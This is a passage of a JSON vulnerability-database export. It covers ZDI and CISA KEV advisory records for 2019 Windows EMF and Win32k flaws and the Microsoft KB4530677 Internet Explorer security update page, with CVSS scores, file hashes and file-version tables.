4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1465"], "modified": "2019-12-11T00:00:00", "id": "ZDI-19-1008", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-1008/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-13T15:49:03", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-11T00:00:00", "type": "zdi", "title": "Microsoft Windows EMF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1466"], "modified": "2019-12-11T00:00:00", "id": "ZDI-19-1007", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-1007/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "A privilege escalation vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k EoP.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-1458", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-06-23T19:27:00", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see the following articles:\n\n * [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>)\nAdditionally, see the following articles for more information about cumulative updates:\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n**Important **\n\n * Except for Internet Explorer 11 on Windows Server 2012, the fixes that are included in this Security Update for Internet Explorer (KB4530677) are also included in the December 2019 Security Monthly Quality Rollup. Installing either the Security Update for Internet Explorer or the Security Monthly Quality Rollup installs the fixes that are in this update.\n * Except for Internet Explorer 11 on Windows Server 2012, this Security Update for Internet Explorer is not applicable for installation on a computer on which the Security Monthly Quality Rollup or the Preview of Monthly Quality Rollup from December 2019 (or a later month) is already installed. This is because those updates contain all the fixes that are in this security update for Internet Explorer.\n * If you use update management processes other than Windows Update, and you automatically approve all security updates classifications for deployment, this Security Update for Internet Explorer (KB4530677), the December 2019 Security Only Quality Update, and the December 2019 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * To obtain this update for Internet Explorer 11 on Server 2012, you must install this Security Update for Internet Explorer (KB4530677). This update is not included in any Security Monthly Quality Rollup or Security Only Quality Update. For Internet Explorer 10 on Windows Server 2012, other called-out installation methods are applicable.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## How to get and install this update\n\n**Before installing this update**You must have the following updates installed and restart the device before you install this update (KB4530677). Installing these updates improves the reliability of the update process and mitigates potential issues while installing this update.\n\n * Servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) or a later SSU update. If you use Windows Update, the SSU will be offered to you automatically. To get the standalone package for the SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\n * SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you use Windows Update, the latest SHA-2 update will be offered to you automatically. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\nAfter these updates are installed, we strongly recommend that you also install the latest servicing stack update (SSU) ([KB4516655](<https://support.microsoft.com/help/4516655>)). If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://catalog.update.microsoft.com>). **Install this update**To install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update for the following versions:\n\n * Internet Explorer 11 for Windows Server 2012 and Windows Embedded 8 Standard\nFor all other versions, see the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530677>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Updates \n \n## Known issues in this security update\n\nWe are not aware of any issues in this update.\n\n## File information\n\n### File attributes\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## File verification\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows8.1-KB4530677-x86.msu| E8AF09810EA8C5DA4198F645133DBE7C9445CC3D| C932C086BB01AFAD2F34921AD3A37A7FB8561232080A82CA12E780B1B3CEE257 \nWindows8.1-KB4530677-arm.msu| 89C25E3550C8E7884B65D847F04B2E76DF58CCFD| F84C4AC579649A3F117684339DF18F1E20D9841B1450BECEF5EB8C0471D56E7E \nWindows8.1-KB4530677-x64.msu| 522EE7BCB4C0E0D787AFA3A2FE1DB6C9CF1A81B2| 8BE57F9CEBA134F0FDF478411BAB0FC895D556C45B66CDF31BA3D86CCA31445B \nIE11-Windows6.2-KB4530677-X86.msu| 40813761E8796A306916003375D07A8CA3E4485C| BBE49A535346B8BF4F250F8E7CD9E347AD1C34FC9E67441B38CD78DC8D61F812 \nIE11-Windows6.2-KB4530677-X64.msu| D55363368B6828B8D477500D57E80D5DB6E54E11| 4AA993B290DB4C897284CB028EDED8CF623D77B8975A957B843939CA078E641F \nWindows8-RT-KB4530677-x64.msu| B05E6E644C5318D48B50056D9E680D3435FBC070| 37E944109F1A084AC8C81EEEBE5B30864C6FC2E74623A681FF4B2332FCA2CC31 \nIE11-Windows6.1-KB4530677-X86.msu| 7954674C075B232D1979ABD3F6CC484E5907D413| BD6861B7BD25BE15A55D3CF9E77EB779B215A7EE82882AD499DBC3FDD0E29C30 \nIE11-Windows6.1-KB4530677-X64.msu| 2B3566D7D62D0A6E4EA9AD5535CF9C35291CC165| D9C9B33093F3A284B9D33C4792A709F002D125971DB4C12A3409B3B7869D814D \nIE9-Windows6.0-KB4530677-X86.msu| 38A34CCF5BF502C296D0F1F54B8EE2147FF8B4A9| BD6C0DADDE476276C7B86F935815A9DBE3E7A9E7819F1ABC61E18101166CFE8A \nIE9-Windows6.0-KB4530677-X64.msu| 80AE296FFFB7E36FEBA99321C912C6804CDC53FB| 5F03D644670182F483D7504AC0D4D466CC80197098F990333F432641268D1989 \n**Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n## Internet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nActxprxy.dll| 6.3.9600.19301| 1,049,600| 26-Feb-2019| 06:20| x86 \nHlink.dll| 6.3.9600.19101| 99,328| 19-Jul-2018| 03:55| x86 \nPngfilt.dll| 11.0.9600.17416| 57,344| 31-Oct-2014| 03:26| x86 \nUrlmon.dll| 11.0.9600.19572| 1,331,712| 19-Nov-2019| 07:01| x86 \nIexplore.exe| 11.0.9600.19036| 817,296| 25-May-2018| 05:24| x86 \nWininetplugin.dll| 6.3.9600.17416| 35,328| 31-Oct-2014| 03:12| x86 \nWininet.dll.mui| 11.0.9600.18538| 46,592| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 56,320| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 57,856| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,664| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,664| 12-Nov-2016| 19:17| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 47,616| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,152| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 55,296| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 45,056| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,712| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,712| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,248| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 39,424| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 35,840| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,760| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 20:29| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 20:29| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,248| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 21-Nov-2019| 03:36| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 20:27| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 20:28| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 20:28| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 20:28| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:30| Not applicable \nHtml.iec| 2019.0.0.18895| 341,504| 02-Jan-2018| 04:51| Not applicable \nInetcpl.cpl| 11.0.9600.19541| 2,058,752| 24-Oct-2019| 02:32| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 307,200| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 293,888| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,304| 10-Jul-2019| 04:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 289,280| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 299,008| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 303,104| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 282,112| 10-Jul-2019| 04:49| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 282,112| 10-Jul-2019| 03:58| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 296,960| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 283,648| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 291,840| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 299,520| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 275,968| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,816| 10-Jul-2019| 04:49| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 293,376| 10-Jul-2019| 04:49| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 296,960| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 258,048| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 256,512| 10-Jul-2019| 04:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 289,280| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 288,256| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 285,184| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 295,424| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 297,472| 10-Jul-2019| 04:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,864| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 295,424| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 294,400| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 294,400| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,864| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,816| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 21-Nov-2019| 03:36| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 286,208| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 281,600| 10-Jul-2019| 04:43| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 286,720| 10-Jul-2019| 04:43| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,352| 10-Jul-2019| 04:42| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 242,176| 10-Jul-2019| 04:43| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 243,200| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 243,200| 10-Jul-2019| 04:50| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 73,728| 16-Aug-2014| 08:34| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 08:33| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 08:34| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,240| 16-Aug-2014| 08:35| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 78,848| 16-Aug-2014| 08:33| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 61,440| 16-Aug-2014| 08:34| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 61,440| 16-Aug-2014| 02:47| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,752| 16-Aug-2014| 08:33| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 62,464| 16-Aug-2014| 08:32| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,096| 16-Aug-2014| 08:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 75,264| 16-Aug-2014| 08:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 08:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,680| 16-Aug-2014| 08:29| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 73,216| 16-Aug-2014| 08:27| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 41,472| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 37,888| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,240| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 70,656| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,168| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,680| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 71,168| 16-Aug-2014| 08:30| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 69,632| 16-Aug-2014| 08:38| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,096| 16-Aug-2014| 08:38| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 68,608| 16-Aug-2014| 08:39| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 21-Nov-2019| 03:36| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 08:38| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 59,904| 16-Aug-2014| 08:38| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 65,536| 16-Aug-2014| 08:38| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 69,120| 16-Aug-2014| 08:38| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 29,696| 16-Aug-2014| 08:39| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 30,720| 16-Aug-2014| 08:34| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 30,720| 16-Aug-2014| 08:33| Not applicable \nJavascriptcollectionagent.dll| 11.0.9600.17416| 60,416| 31-Oct-2014| 02:57| x86 \nDiagnosticshub.scriptedsandboxplugin.dll| 11.0.9600.17905| 230,400| 15-Jun-2015| 20:50| x86 \nUrlmon.dll.mui| 11.0.9600.18378| 46,080| 11-Jun-2016| 20:26| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 20:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 20:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 51,712| 11-Jun-2016| 20:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 54,272| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 18:10| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,688| 11-Jun-2016| 20:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 45,056| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:13| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 39,936| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 39,424| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 51,200| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,688| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 19:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 21-Nov-2019| 03:36| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:05| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 19:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:23| Not applicable \nJsproxy.dll| 11.0.9600.17416| 47,104| 31-Oct-2014| 03:16| x86 \nWininet.dll| 11.0.9600.19572| 4,387,840| 19-Nov-2019| 07:05| x86 \nInetcpl.cpl.mui| 11.0.9600.18817| 114,176| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,560| 07-Sep-2017| 21:09| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 124,928| 07-Sep-2017| 21:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 122,880| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,048| 07-Sep-2017| 21:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 138,240| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 114,688| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18666| 114,688| 16-Apr-2017| 08:51| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 131,584| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 117,760| 07-Sep-2017| 21:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 122,368| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 134,144| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 107,008| 07-Sep-2017| 21:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18838| 123,392| 14-Oct-2017| 08:46| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 127,488| 07-Sep-2017| 21:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 128,512| 07-Sep-2017| 21:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 88,064| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18838| 82,944| 14-Oct-2017| 08:47| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,440| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,392| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 120,320| 07-Sep-2017| 21:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,560| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,952| 07-Sep-2017| 22:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 22:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 128,000| 07-Sep-2017| 22:25| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 22:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 22:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 22:25| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,416| 21-Nov-2019| 03:36| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 121,856| 07-Sep-2017| 20:56| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 115,712| 07-Sep-2017| 21:03| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 21:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,440| 07-Sep-2017| 21:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 74,752| 07-Sep-2017| 21:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 75,776| 07-Sep-2017| 21:09| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 75,776| 07-Sep-2017| 21:10| Not applicable \nIeui.dll| 11.0.9600.18895| 476,160| 02-Jan-2018| 04:44| x86 \nIedkcs32.dll| 18.0.9600.19541| 333,312| 24-Oct-2019| 02:32| x86 \nInstall.ins| Not applicable| 464| 19-Nov-2019| 05:36| Not applicable \nIeapfltr.dat| 10.0.9301.0| 616,104| 24-Sep-2013| 02:20| Not applicable \nIeapfltr.dll| 11.0.9600.19572| 710,144| 19-Nov-2019| 07:00| x86 \nIepeers.dll| 11.0.9600.19507| 128,000| 06-Oct-2019| 02:56| x86 \nLicmgr10.dll| 11.0.9600.17416| 27,136| 31-Oct-2014| 03:03| x86 \nTdc.ocx| 11.0.9600.18666| 73,216| 16-Apr-2017| 07:29| x86 \nDiagnosticshub.datawarehouse.dll| 11.0.9600.18895| 489,472| 